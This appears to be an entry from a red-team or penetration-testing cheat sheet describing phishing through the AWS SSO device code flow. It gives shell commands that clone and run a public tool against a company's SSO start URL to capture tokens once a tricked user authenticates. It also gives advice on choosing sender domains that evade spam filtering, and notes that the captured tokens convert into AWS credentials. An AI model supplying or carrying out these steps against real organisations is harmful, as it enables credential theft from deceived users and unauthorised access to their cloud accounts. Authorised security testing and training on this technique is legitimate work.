Phishing via SSO Device Codes
Exploit AWS SSO device code flows to trick users into authenticating and returning valid tokens. Clone the AWS SSO Device Code Tool
git clone https://github.com/christophetd/aws-sso-device-code-authentication
cd aws-sso-device-code-authentication
python main.py \
--sso-start-url https://mycompany.awsapps.com/start \
--sso-region us-east-1 \
--output-file ./sso_token.json
note
Ensure your sender domain is unlikely to be flagged as spam. Commonly trusted domains include gmail.com
, hotmail.com
, yahoo.com
, etc.
note
After the user authenticates, you’ll receive AWS SSO tokens valid for 8 hours, which can be exchanged for AWS credentials.